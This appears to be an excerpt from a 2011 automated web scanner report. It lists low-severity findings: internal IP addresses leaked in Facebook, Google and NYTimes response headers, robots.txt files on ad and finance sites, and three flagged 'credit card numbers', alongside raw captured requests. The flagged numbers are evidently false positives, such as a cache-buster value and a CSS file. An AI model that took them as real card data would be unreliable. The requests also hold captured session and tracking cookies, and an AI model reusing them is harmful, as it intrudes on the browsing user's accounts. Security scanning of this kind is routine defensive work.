if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

23.3. http://meter-svc.nytimes.com/meter.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://meter-svc.nytimes.com
Path:	/meter.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.0.0

Request

Response

23.4. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.184

Request

GET /connect/xd_proxy.php?version=1 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.184
Vary: Accept-Encoding
Cache-Control: public, max-age=1216
Expires: Thu, 12 May 2011 11:59:00 GMT
Date: Thu, 12 May 2011 11:38:44 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

23.5. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.205.53

Request

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_925756&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.205.53
X-Cnection: close
Date: Thu, 12 May 2011 11:03:01 GMT
Content-Length: 0

23.6. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.136.131

Request

GET /extern/login_status.php?api_key=116027085089150&app_id=116027085089150&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df59f54ef8%26origin%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Ff3dc5c8b3%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1d00aca1%26origin%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Ff3dc5c8b3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32b0f9a04%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df195749e5%26origin%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Ff3dc5c8b3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32b0f9a04&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df156192d64%26origin%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Ff3dc5c8b3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32b0f9a04&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2b4911b08%26origin%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Ff3dc5c8b3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32b0f9a04&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f156192d64&origin=http%3A%2F%2Fwww.foxbusiness.com%2Ff3dc5c8b3&relation=parent&transport=postmessage&frame=f32b0f9a04
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.136.131
X-Cnection: close
Date: Thu, 12 May 2011 11:38:01 GMT
Content-Length: 0

23.7. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.210.45

Request

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_925756&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.210.45
X-Cnection: close
Date: Thu, 12 May 2011 11:03:26 GMT
Content-Length: 0

23.8. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.145.124

Request

GET /extern/login_status.php?api_key=100001111898866&app_id=100001111898866&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df10322942c%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2e5e42118%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a04dca%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3a8785378%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a04dca&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3e71225fc%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a04dca&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfd5d15fc%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a04dca&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.145.124
X-Cnection: close
Date: Thu, 12 May 2011 11:37:23 GMT
Content-Length: 17

Application Error

23.9. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.164.62

Request

Response

23.10. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.152.44

Request

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_925756&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.152.44
X-Cnection: close
Date: Thu, 12 May 2011 10:59:54 GMT
Content-Length: 0

23.11. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.170.45

Request

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_925756&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.170.45
X-Cnection: close
Date: Thu, 12 May 2011 11:03:50 GMT
Content-Length: 0

23.12. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.167.47

Request

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_925756&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.167.47
X-Cnection: close
Date: Thu, 12 May 2011 11:00:55 GMT
Content-Length: 0

23.13. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.145.48

Request

Response

23.14. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.140.121

Request

GET /plugins/like.php?action=recommend&api_key=116027085089150&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df196b91cf4%26origin%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Ff3dc5c8b3%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

23.15. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.148.115

Request

GET /plugins/like.php?action=recommend&api_key=100001111898866&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df21a2dada%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fbloom.bg%2FjZW47c&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

23.16. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.125.108

Request

GET /plugins/like.php?action=recommend&api_key=100001111898866&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df247c0f3%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fbloom.bg%2FjZW47c&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

23.17. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.139.129

Request

GET /plugins/like.php?action=recommend&api_key=116027085089150&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3f506b638%26origin%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Ff3dc5c8b3%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

23.18. http://www.google.com/sdch/vD843DpA.dct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/sdch/vD843DpA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.31.196.197

Request

GET /sdch/vD843DpA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj
If-Modified-Since: Thu, 12 May 2011 00:18:06 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Thu, 12 May 2011 09:05:47 GMT
Date: Thu, 12 May 2011 11:16:10 GMT
Expires: Thu, 12 May 2011 11:16:10 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 116591

Domain: .google.com
Path: /search

<!doctype html> <head> <title>re - Google Search</title> <script>window.google={kEI:"28555,29481,2966,29876,29881,29891,30035,30039,30058",kCSI:{e:"25907,4,29
...[SNIP]...
<a href="/search?hl=en&q=related: http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCN clk(this.href,'','','','1','','0CCk ')">
...[SNIP]...
<b>www.ahttp://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCN clk(this.href,'','','',' UBEBYwBg')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:www.edmunds.com/used-cars/+used+carNKvLeHS7sb0J:www.carsdirect.com/used_cars/search+used+car&hl=en&ct=clnk&gl=us&source=www.google.com','','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rectv.com/DTVAPP/content/contact_us+directKvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account+direct 4','AFQjCN clk(this.href,'','','','4',''
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: OJ7l3PBi2ywJ:www.usedcars.com/+used+carH75rMPosXksJ:www.cars.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car topics.nytimes.com/top/news/business/ &rct=j&sa=
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:4AUACFJFdYwJ:search.aol.com/+aol3-ZEIkE37Z4J:www.directv.com/+direct1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &hl=en&ct=clnk&gl=us&source=www.google
...[SNIP]...
<a href="/search?hl=en&q=related:http://172.31.196.197:8888/search?q=cache: &cd= &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNGclk(this.href,'','','','1','','0C QIDAG')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:_AF_a1pfx4YJ:www.craigslist.com/+o&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','',' clk(this.href,'','','','8',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','',' 9','AFQjCNFclk(this.href,'','','','9','','0C en.wikipedia.org
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNFclk(this.href,'','','','1rwt(this,'','','','1 cl
...[SNIP]...

24. Credit card numbers disclosed previous next
There are 3 instances of this issue:

http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B
http://graphics8.nytimes.com/css/0.1/screen/common/modules/scrollbox.css
http://www.carlyle.com/Contact/item7607.html

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

24.1. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cgiwsc.enhancedsitebuilder.com
Path:	/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The following credit card number was disclosed in the response:

3572320435196161

Request

GET /cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B?cc=0.3572320435196161 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:40 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 2133

// ----------------------------------------------------------------------------
if (typeof(getTopWindow) != "function") { getTopWindow = function() { return window; }; }
if (typeof(ACCESSIBLE_VERSION)
...[SNIP]...
----------------------------------
var rurl = new URL('http://' + appInfo.server + URL.jdecode("%2Fcgix%2FAppLoader.cls%2FAENDU0IN29GG%2F7008%2F25529%2Flanguage%253Aen%253Bcountry%253AUS%253B%3Fcc%3D0.3572320435196161"),true,true);
rurl.setParameter('s2','true',true);
loadScript('http://' + appInfo.server + '/cgix/concat-o-mat.cls?id=cgix.stage1');
loadScript(rurl.toExternalForm());

// ----------------------------
...[SNIP]...

24.2. http://graphics8.nytimes.com/css/0.1/screen/common/modules/scrollbox.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://graphics8.nytimes.com
Path:	/css/0.1/screen/common/modules/scrollbox.css

Issue detail

The following credit card number was disclosed in the response:

344632010031818

Request

GET /css/0.1/screen/common/modules/scrollbox.css HTTP/1.1
Host: graphics8.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 1182
Content-Type: text/css
Last-Modified: Wed, 31 Mar 2010 15:29:01 GMT
ETag: "49e-4bb36a3d"
Accept-Ranges: bytes
Cache-Control: private, max-age=78653
Date: Thu, 12 May 2011 11:03:14 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1182

/*$Id: scrollbox.css 34463 2010-03-18 18:25:11Z donohoe $
/css/0.1/screen/common/modules/scrollbox.css
(c)2006 - 2009 The New York Times Company */

.scrollBox {
position: relative;
height: 160px;
padding-right: 20px;
overflow: hidde
...[SNIP]...

24.3. http://www.carlyle.com/Contact/item7607.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.carlyle.com
Path:	/Contact/item7607.html

Issue detail

The following credit card number was disclosed in the response:

4969505065765

Request

Response

25. Robots.txt file previous next
There are 36 instances of this issue:

http://ad.doubleclick.net/clk
http://ad.us.doubleclick.net/adj/ftcom.5887.ftfm/private-equity
http://b.scorecardresearch.com/b
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://by.optimost.com/counter/553/-/129/event.js
http://convctr.overture.com/images/cc/cc.gif
http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBanner.js
http://engine.cmmeglobal.com/v1/page-view
http://feeds.feedburner.com/CrmRadar
http://generalatlantic.com/
http://googleads.g.doubleclick.net/pagead/ads
http://graphics8.nytimes.com/css/blogs/3.1/screen/themes/dealbook/style.css
http://investmentfirmsdirect.com/
http://l.addthiscdn.com/live/t00/250lo.gif
http://media.ft.com/h/subs.html
http://pagead2.googlesyndication.com/pagead/imgad
http://privatemoneytalk.com/
http://pubads.g.doubleclick.net/gampad/ads
http://www.beneschlaw.com/
http://www.dmoc.com/sites/default/files/home-tetons.jpg
http://www.facebook.com/plugins/like.php
http://www.ft.com/indepth/privateequity
http://www.google-analytics.com/__utm.gif
http://www.huroncapital.com/
http://www.managedfuturespecialist.com/
http://www.milbank.com/
http://www.nytimes.com/adx/bin/adx_remote.html
http://www.opalgroup.net/google/ais2010.html
http://www.pillsburylaw.com/
http://www.porterwright.com/
http://www.privateequityinfo.com/
http://www.privatemoneytalk.com/
http://www.stroock.com/
http://www.vcgate.com/Private-Equity.htm
http://www.vcprodatabase.com/

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

25.1. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
